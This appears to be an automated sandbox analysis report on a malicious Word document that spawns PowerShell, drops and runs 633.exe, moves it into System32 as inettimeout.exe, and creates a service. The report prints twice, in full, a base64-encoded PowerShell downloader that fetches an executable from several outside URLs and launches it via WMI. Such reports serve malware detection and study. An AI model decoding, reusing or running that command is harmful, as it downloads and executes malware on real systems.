Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3.j.............3.j....@8>.L|.j......al '.j..alA..&L|.j.............7.j.......j@8>...1............. '.j...j....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................H......u...................u..0.............h.......................................>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,..........._._.G.E.N.U.S. . . . . . . . . . .:. .2.........h...................................(...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,......................u,..................u..0.............h.......................................>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......#..._._.C.L.A.S.S. . . . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...........#...........>...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......#..............u,..................u..0.............h.......................#...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......'..._._.S.U.P.E.R.C.L.A.S.S. . . . . .:. ...........h...-...................'...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......'..............u,..................u..0.............h...6...................'...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......+..._._.D.Y.N.A.S.T.Y. . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...........+...........>...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......+..............u,..................u..0.............h...N...................+...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,......./..._._.R.E.L.P.A.T.H. . . . . . . . .:. ...........h...\.................../...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,......./..............u,..................u..0.............h...j.................../...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......3..._._.P.R.O.P.E.R.T.Y._.C.O.U.N.T. .:. .2.........h...y...................3...........(...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......3..............u,..................u..0.............h.......................3...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......7..._._.D.E.R.I.V.A.T.I.O.N. . . . . .:. .{.}.......h.......................7...........*...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......7..............u,..................u..0.............h.......................7...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................;..._._.S.E.R.V.E.R. . . . . . . . . .:. .`l..............1...1.........."`l............&.....1...1.....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......;..............u,..................u..0.............h.......................;...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......?..._._.N.A.M.E.S.P.A.C.E. . . . . . .:. ...........h.......................?...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......?..............u,..................u..0.............h.......................?...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......C..._._.P.A.T.H. . . . . . . . . . . .:. ...........h.......................C...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......C..............u,..................u..0.............h.......................C...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......G...P.r.o.c.e.s.s.I.d. . . . . . . . .:. .2.6.8.....h.......................G...........,...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......G..............u,..................u..0.............h.......................G...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......K...R.e.t.u.r.n.V.a.l.u.e. . . . . . .:. .0.........h.......................K...........(...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........,.......K..............u,..................u..0.............h.......................K...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................O.......<......u...................u..0.............h.......................O.......x.......>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................S..............u...................u..0.............h...)...................S...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................W..............u...................u..0.............h...6...................W...............>..u........Jump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\inettimeout.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\inettimeout.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docVirustotal: Detection: 64%
Source: Pr#U00c3#U00b3xima reuni#U00c3#U00b3n de finanzas.docReversingLabs: Detection: 54%
Sample requires command line parameters (based on API chain)Show sources
Source: C:\Users\user\633.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_3-38094
Source: C:\Windows\System32\inettimeout.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_5-4532
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABXAGEAcAB4AHAAZgBvAGsAPQAnAFQAawB4AHUAYwBjAGIAdQBzAHQAJwA7ACQASQB0AGEAYwBuAHUAbABxACAAPQAgACcANgAzADMAJwA7ACQAQwBhAGMAdABiAGgAawBrAHUAcABjAD0AJwBOAG0AdgB6AHUAdABzAGIAaQB4AHcAZgAnADsAJABEAHYAZABqAGwAZgBqAGUAcQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASQB0AGEAYwBuAHUAbABxACsAJwAuAGUAeABlACcAOwAkAFMAcQB4AHIAbgBkAG0AbgB3AG4APQAnAEQAbQBhAHkAdQB1AG4AaABwAHAAegAnADsAJABCAHUAZwBsAHoAdABmAGQAaAA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAAbgBFAFQALgBXAGUAQgBjAEwASQBFAE4AdAA7ACQARAB4AHkAZwBsAGcAeQBjAHUAawA9ACcAaAB0AHQAcABzADoALwAvAGwAdQBpAHMAbABhAHIANgA4AC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANgB4AHIANQB1AC0AMQB4AG8AZwAtADIAOQA1ADkANQAvACoAaAB0AHQAcAA6AC8ALwBrAGgAbwBtAGEAeQBuAGgAbwBtAG4AaAB1AGEALgB2AG4ALwBkAHUAcAAtAGkAbgBzAHQAYQBsAGwAZQByAC8AdAB5AGwAMwAxAHgAaQAtAG4AbQBmAGgALQA2ADQAMwA1ADQAMgAvACoAaAB0AHQAcABzADoALwAvAGYAYQAuAGsAaABhAG4AbgBlAHMAaABpAG4AaABvAHQAZQBsAC4AaQByAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADQAdAAxAGwALQBhAHIAagB1AGIAZABtADMAOQBjAC0AMgA0ADIANgA0ADMAMwA3ADMAMQAvACoAaAB0AHQAcAA6AC8ALwBsAGkAdAB0AGwAZQBnAHIAZQBlAG4AdwBoAGUAZQBsAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAyADAAcABhAHYAMAAtADkANQA3AC0AMQA0ADAAMgA3ADAAMAA4ADYAOAAvACoAaAB0AHQAcABzADoALwAvAHIAYQB3AGQAYQBoAHQAcgB1AHMAdAAuAG8AcgBnAC8AcgBwAHIAbABxAC8AcwB4AHQAdABtAC0AaAB1AGcAcAB3AGgAMQAtADEANwAxAC8AJwAuACIAUwBgAHAAbABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABXAGEAbAB1AGQAZgBuAGIAdwByAHUAdwB4AD0AJwBJAGEAcABoAG4AaABxAGYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEoAdgB0AGUAdQBmAHcAbAAgAGkAbgAgACQARAB4AHkAZwBsAGcAeQBjAHUAawApAHsAdAByAHkAewAkAEIAdQBnAGwAegB0AGYAZABoAC4AIgBEAE8AdwBOAGwAYABPAGEAYABkAGYAYABpAGwAZQAiACgAJABKAHYAdABlAHUAZgB3AGwALAAgACQARAB2AGQAagBsAGYAagBlAHEAKQA7ACQARABiAHMAcwB2AGMAcQBlAHMAcQA9ACcAVAB0AGgAeQBsAGgAdgBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQARAB2AGQAagBsAGYAagBlAHEAKQAuACIAbABFAG4AYABHAFQASAAiACAALQBnAGUAIAAyADEANgA0ADUAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAEUAYABBAHQARQAiACgAJABEAHYAZABqAGwAZgBqAGUAcQApADsAJABKAHkAcABhAHIAZgByAGcAdQA9ACcAQQBlAHYAaQBiAG8AZABzAGYAeQAnADsAYgByAGUAYQBrADsAJABHAHYAegBwAHcAagBrAHUAaAA9ACcASQB1AGYAYwB6AHoAYgBrAGgAcQBpAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBmAGcAYwBqAHIAaABpAD0AJwBFAHMAcAB2AHgAagBwAGQAdAAnAA==
Source: unknownProcess created: C:\Users\user\633.exe C:\Users\user\633.exe
Source: unknownProcess created: C:\Users\user\633.exe --4bc37bca
Source: unknownProcess created: C:\Windows\System32\inettimeout.exe C:\Windows\system32\inettimeout.exe
Source: unknownProcess created: C:\Windows\System32\inettimeout.exe --597fd3a1
Source: C:\Users\user\633.exeProcess created: C:\Users\user\633.exe --4bc37bcaJump to behavior
Source: C:\Windows\System32\inettimeout.exeProcess created: C:\Windows\System32\inettimeout.exe --597fd3a1Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\633.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior

Data Obfuscation:

barindex
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABXAGEAcAB4AHAAZgBvAGsAPQAnAFQAawB4AHUAYwBjAGIAdQBzAHQAJwA7ACQASQB0AGEAYwBuAHUAbABxACAAPQAgACcANgAzADMAJwA7ACQAQwBhAGMAdABiAGgAawBrAHUAcABjAD0AJwBOAG0AdgB6AHUAdABzAGIAaQB4AHcAZgAnADsAJABEAHYAZABqAGwAZgBqAGUAcQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASQB0AGEAYwBuAHUAbABxACsAJwAuAGUAeABlACcAOwAkAFMAcQB4AHIAbgBkAG0AbgB3AG4APQAnAEQAbQBhAHkAdQB1AG4AaABwAHAAegAnADsAJABCAHUAZwBsAHoAdABmAGQAaAA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAAbgBFAFQALgBXAGUAQgBjAEwASQBFAE4AdAA7ACQARAB4AHkAZwBsAGcAeQBjAHUAawA9ACcAaAB0AHQAcABzADoALwAvAGwAdQBpAHMAbABhAHIANgA4AC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANgB4AHIANQB1AC0AMQB4AG8AZwAtADIAOQA1ADkANQAvACoAaAB0AHQAcAA6AC8ALwBrAGgAbwBtAGEAeQBuAGgAbwBtAG4AaAB1AGEALgB2AG4ALwBkAHUAcAAtAGkAbgBzAHQAYQBsAGwAZQByAC8AdAB5AGwAMwAxAHgAaQAtAG4AbQBmAGgALQA2ADQAMwA1ADQAMgAvACoAaAB0AHQAcABzADoALwAvAGYAYQAuAGsAaABhAG4AbgBlAHMAaABpAG4AaABvAHQAZQBsAC4AaQByAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADQAdAAxAGwALQBhAHIAagB1AGIAZABtADMAOQBjAC0AMgA0ADIANgA0ADMAMwA3ADMAMQAvACoAaAB0AHQAcAA6AC8ALwBsAGkAdAB0AGwAZQBnAHIAZQBlAG4AdwBoAGUAZQBsAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAyADAAcABhAHYAMAAtADkANQA3AC0AMQA0ADAAMgA3ADAAMAA4ADYAOAAvACoAaAB0AHQAcABzADoALwAvAHIAYQB3AGQAYQBoAHQAcgB1AHMAdAAuAG8AcgBnAC8AcgBwAHIAbABxAC8AcwB4AHQAdABtAC0AaAB1AGcAcAB3AGgAMQAtADEANwAxAC8AJwAuACIAUwBgAHAAbABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABXAGEAbAB1AGQAZgBuAGIAdwByAHUAdwB4AD0AJwBJAGEAcABoAG4AaABxAGYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEoAdgB0AGUAdQBmAHcAbAAgAGkAbgAgACQARAB4AHkAZwBsAGcAeQBjAHUAawApAHsAdAByAHkAewAkAEIAdQBnAGwAegB0AGYAZABoAC4AIgBEAE8AdwBOAGwAYABPAGEAYABkAGYAYABpAGwAZQAiACgAJABKAHYAdABlAHUAZgB3AGwALAAgACQARAB2AGQAagBsAGYAagBlAHEAKQA7ACQARABiAHMAcwB2AGMAcQBlAHMAcQA9ACcAVAB0AGgAeQBsAGgAdgBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQARAB2AGQAagBsAGYAagBlAHEAKQAuACIAbABFAG4AYABHAFQASAAiACAALQBnAGUAIAAyADEANgA0ADUAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAEUAYABBAHQARQAiACgAJABEAHYAZABqAGwAZgBqAGUAcQApADsAJABKAHkAcABhAHIAZgByAGcAdQA9ACcAQQBlAHYAaQBiAG8AZABzAGYAeQAnADsAYgByAGUAYQBrADsAJABHAHYAegBwAHcAagBrAHUAaAA9ACcASQB1AGYAYwB6AHoAYgBrAGgAcQBpAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBmAGcAYwBqAHIAaABpAD0AJwBFAHMAcAB2AHgAagBwAGQAdAAnAA==
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\633.exeCode function: 3_2_00418120 GetModuleHandleA,LoadLibraryA,GetProcAddress,3_2_00418120
PE file contains an invalid checksumShow sources
Source: 633.exe.1.drStatic PE information: real checksum: 0x8ba46 should be: 0x8bc09
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\633.exeCode function: 3_2_0043009A push ecx; ret 3_2_004300AD
Source: C:\Users\user\633.exeCode function: 3_2_00430291 push ecx; ret 3_2_004302A4

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\System32\inettimeout.exeExecutable created and started: C:\Windows\System32\inettimeout.exeJump to behavior
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\633.exeJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\633.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\633.exePE file moved: C:\Windows\System32\inettimeout.exeJump to behavior

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\633.exeJump to dropped file
Contains functionality to start windows servicesShow sources
Source: C:\Users\user\633.exeCode function: 4_2_003DE4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_003DE4A8

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\633.exeFile opened: C:\Windows\system32\inettimeout.exe:Zone.Identifier read attributes | deleteJump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\633.exeCode function: 3_2_0042C3DF PtInRect,GetParent,GetParent,IsIconic,GetParent,3_2_0042C3DF
Source: C:\Users\user\633.exeCode function: 3_2_0041C474 IsIconic,GetWindowPlacement,GetWindowRect,3_2_0041C474
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
